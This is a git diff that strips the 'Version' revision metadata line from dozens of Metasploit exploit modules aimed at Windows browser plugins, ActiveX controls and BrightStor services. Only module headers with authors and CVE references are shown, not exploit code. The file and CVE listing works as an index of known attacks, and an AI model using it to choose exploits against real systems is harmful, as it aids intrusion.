b/modules/exploits/windows/brightstor/tape_engine.rb index 18a9a5a91b..59082d36ed 100644 --- a/modules/exploits/windows/brightstor/tape_engine.rb +++ b/modules/exploits/windows/brightstor/tape_engine.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6076' ], diff --git a/modules/exploits/windows/brightstor/tape_engine_8A.rb b/modules/exploits/windows/brightstor/tape_engine_8A.rb index 0ff6f778f1..83583db75e 100644 --- a/modules/exploits/windows/brightstor/tape_engine_8A.rb +++ b/modules/exploits/windows/brightstor/tape_engine_8A.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68330'], diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb index 4e23df13a7..6defe3125b 100644 --- a/modules/exploits/windows/brightstor/universal_agent.rb +++ b/modules/exploits/windows/brightstor/universal_agent.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1018'], diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb index 32f8cc6f85..0a64ebeae4 100644 --- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote '@vicheck', # initial analysis 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2883' ], diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb index 687daf9566..eb574e2257 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # msf exploit 'Unknown' # malware version seen used in targeted attacks ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-2110'], diff --git a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb index 7bd33b3e22..32e39faa92 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'bannedit', # Metasploit version, 'Unknown' # Malcode version seen used in targeted attacks ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-0609'], diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index 085c67a70d..b8e973af38 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote victim machine in order to work properly. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'sinn3r', diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb index 48ce661fa4..c1c6dc6ed2 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Unknown', # Found being openly exploited 'jduck' # Metasploit version ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-1297'], diff --git a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb index 70962791ec..e315a25410 100644 --- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck', 'jabra' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3459' ], diff --git a/modules/exploits/windows/browser/adobe_geticon.rb b/modules/exploits/windows/browser/adobe_geticon.rb index ec47b1eff2..bf2d510125 100644 --- a/modules/exploits/windows/browser/adobe_geticon.rb +++ b/modules/exploits/windows/browser/adobe_geticon.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Didier Stevens ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0927' ], diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb index 69fb060fc6..f6e2e55e2a 100644 --- a/modules/exploits/windows/browser/adobe_jbig2decode.rb +++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote # obfuscation techniques and pdf template from util_printf 'MC', 'Didier Stevens ', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2009-0658' ], diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb index 9ee1cebf3a..fa9206a9ea 100644 --- a/modules/exploits/windows/browser/adobe_media_newplayer.rb +++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck', 'jabra' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4324' ], diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb index bb824738ad..0dcce3dac8 100644 --- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb +++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'David Kennedy "ReL1K" '], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3653'], diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb index 4d449d4c4f..daa246977f 100644 --- a/modules/exploits/windows/browser/adobe_utilprintf.rb +++ b/modules/exploits/windows/browser/adobe_utilprintf.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'Didier Stevens ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2992' ], diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index 32c72af9fc..e71d8ed0ac 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'skape', 'thief ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0636' ], diff --git a/modules/exploits/windows/browser/amaya_bdo.rb b/modules/exploits/windows/browser/amaya_bdo.rb index 101f00b3d8..86657c7b90 100644 --- a/modules/exploits/windows/browser/amaya_bdo.rb +++ b/modules/exploits/windows/browser/amaya_bdo.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dookie, original exploit by Rob Carter' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0323' ], diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb index 8515f2d696..9c37381e18 100644 --- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb +++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'rgod ', # Original exploit [see References] 'Trancer ' # Metasploit implementation ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '54706' ], diff --git a/modules/exploits/windows/browser/aol_icq_downloadagent.rb b/modules/exploits/windows/browser/aol_icq_downloadagent.rb index 9cb78c5f1e..d6fa08af19 100644 --- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb +++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5650' ], diff --git a/modules/exploits/windows/browser/apple_itunes_playlist.rb b/modules/exploits/windows/browser/apple_itunes_playlist.rb index f06381c84f..52a2ab5487 100644 --- a/modules/exploits/windows/browser/apple_itunes_playlist.rb +++ b/modules/exploits/windows/browser/apple_itunes_playlist.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0043' ], diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb index 2ad21d750c..04ac60ecae 100644 --- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb +++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1818' ], diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb index 93d87ac6ef..ecaae6bbc7 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'egypt' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0015' ], diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb index 2391b36c69..6ac63df452 100644 --- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb +++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1799' ], diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index 779e2e7939..a993cd2897 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5107' ], diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb index 7b2a1b5d2a..f673b54b77 100644 --- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb +++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.athoc.com/products/IWSAlerts_overview.aspx' ] diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb index 046ac53bf7..fb13f49e1a 100644 --- a/modules/exploits/windows/browser/autodesk_idrop.rb +++ b/modules/exploits/windows/browser/autodesk_idrop.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Elazar Broad ', # Original exploit [see References] 'Trancer ' # Metasploit implementation ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '53265' ], diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb index 2ef4ac8eff..8dd1dfc20f 100644 --- a/modules/exploits/windows/browser/aventail_epi_activex.rb +++ b/modules/exploits/windows/browser/aventail_epi_activex.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Nikolas Sotiriu', # original discovery / poc 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '67286'], diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb index 343c589a1b..edf70d1c0c 100644 --- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb +++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb @@ -47,7 +47,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Trancer ', # Metasploit implementation 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4588' ], diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb index d20a6e0264..85fdfe7daa 100644 --- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb +++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # original discovery & metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4850' ], diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index dd7de45cdc..f9d0ae766f 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1612' ], diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index 372c2c9822..cc332720bc 100644 --- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ', 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'EDB', '4094' ], diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index 8ca88ff4f5..2954843631 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # msf 'sinn3r' # wbemexec tekniq ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2683'], diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb index 9f74970785..0b1776245e 100644 --- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb +++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1472' ], diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index 641ac6819f..4850b59b1a 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'shinnai', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5002' ], diff --git a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb index ba225b2f78..7c9a5b2f8b 100644 --- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb +++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'bannedit' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2039' ], diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index d3019a0eb4..68d0d03894 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'bannedit', 'sinn3r', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2882'], diff --git a/modules/exploits/windows/browser/communicrypt_mail_activex.rb b/modules/exploits/windows/browser/communicrypt_mail_activex.rb index a2a2e35ff8..5ca97d58be 100644 --- a/modules/exploits/windows/browser/communicrypt_mail_activex.rb +++ b/modules/exploits/windows/browser/communicrypt_mail_activex.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Lincoln', # Original exploit author 'dookie' # MSF module author ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64839' ], diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index 576a2bd903..e83953ea9c 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0955' ], diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb index fa4f4dda5c..b7803aa617 100644 --- a/modules/exploits/windows/browser/dxstudio_player_exec.rb +++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2011' ], diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index fec5e92f4f..d5688a3fb7 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4466' ], diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index 849fed95a4..3d1431c534 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => BSD_LICENSE, 'Author' => [ 'LSO ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2919' ], diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb index 72d228d091..3ab60922af 100644 --- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb +++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4830'], diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index 84d078e673..1a085cd4c3 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3605' ], diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index e8153ede4f..810c2b64c8 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb +++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5711' ], diff --git a/modules/exploits/windows/browser/gom_openurl.rb b/modules/exploits/windows/browser/gom_openurl.rb index e79390caac..4cf734417d 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5779'], diff --git a/modules/exploits/windows/browser/greendam_url.rb b/modules/exploits/windows/browser/greendam_url.rb index 92266b0c86..688e4c8eca 100644 --- a/modules/exploits/windows/browser/greendam_url.rb +++ b/modules/exploits/windows/browser/greendam_url.rb @@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '55126'], diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb index 8801c94e12..eede7ff55b 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Andrea Micalizzi', # aka rgod original discovery 'juan vazquez', # Original Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2404'], diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb index 3e03f5f35a..7322dada72 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0492'], diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb index 29b6f669e4..c1fcd4c6d7 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-6530'], diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index f159e3c78f..fdc32cd2fc 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1819' ], diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb index 0ee008d78a..2662c74205 100644 --- a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb +++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Dz_attacker ', # original file format module 'jduck' # converted HttpServer module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0679' ], diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb index 80df38008f..53e8633822 100644 --- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb +++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb @@ -22,8 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', - 'References' => [ [ 'CVE', '2009-0215' ], diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index 652467ca1b..03be2c5721 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Elazar Broad ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4474' ], diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index be9664c5cb..cb58cedabe 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -58,7 +58,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'hdm', ], - 'Version' => '$Revision$', 'References' => [ # MDAC diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb index 1188c4f098..2a880988ae 100644 --- a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb +++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'hdm', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-1016' ], diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index 5379280157..4cc70f581d 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -41,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'natron' ], - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://support.microsoft.com/kb/182569' ], diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index 889adda256..d4149ea286 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # Metasploit module 'mr_me ' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'EDB', '15668' ], diff --git a/modules/exploits/windows/browser/java_basicservice_impl.rb b/modules/exploits/windows/browser/java_basicservice_impl.rb index fa61f32270..3202d3ca3e 100644 --- a/modules/exploits/windows/browser/java_basicservice_impl.rb +++ b/modules/exploits/windows/browser/java_basicservice_impl.rb @@ -39,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Matthias Kaiser', # Discovery, PoC, metasploit module 'egypt' # metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3563' ], diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index 512737ac2b..5eb12066b4 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Frederic Hoguin', # Discovery, PoC 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4452' ], diff --git a/modules/exploits/windows/browser/java_docbase_bof.rb b/modules/exploits/windows/browser/java_docbase_bof.rb index 8b9024f0b0..0dd7ef6401 100644 --- a/modules/exploits/windows/browser/java_docbase_bof.rb +++ b/modules/exploits/windows/browser/java_docbase_bof.rb @@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'jduck', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3552' ], diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb index f1e9f5e00e..05551f796a 100644 --- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb +++ 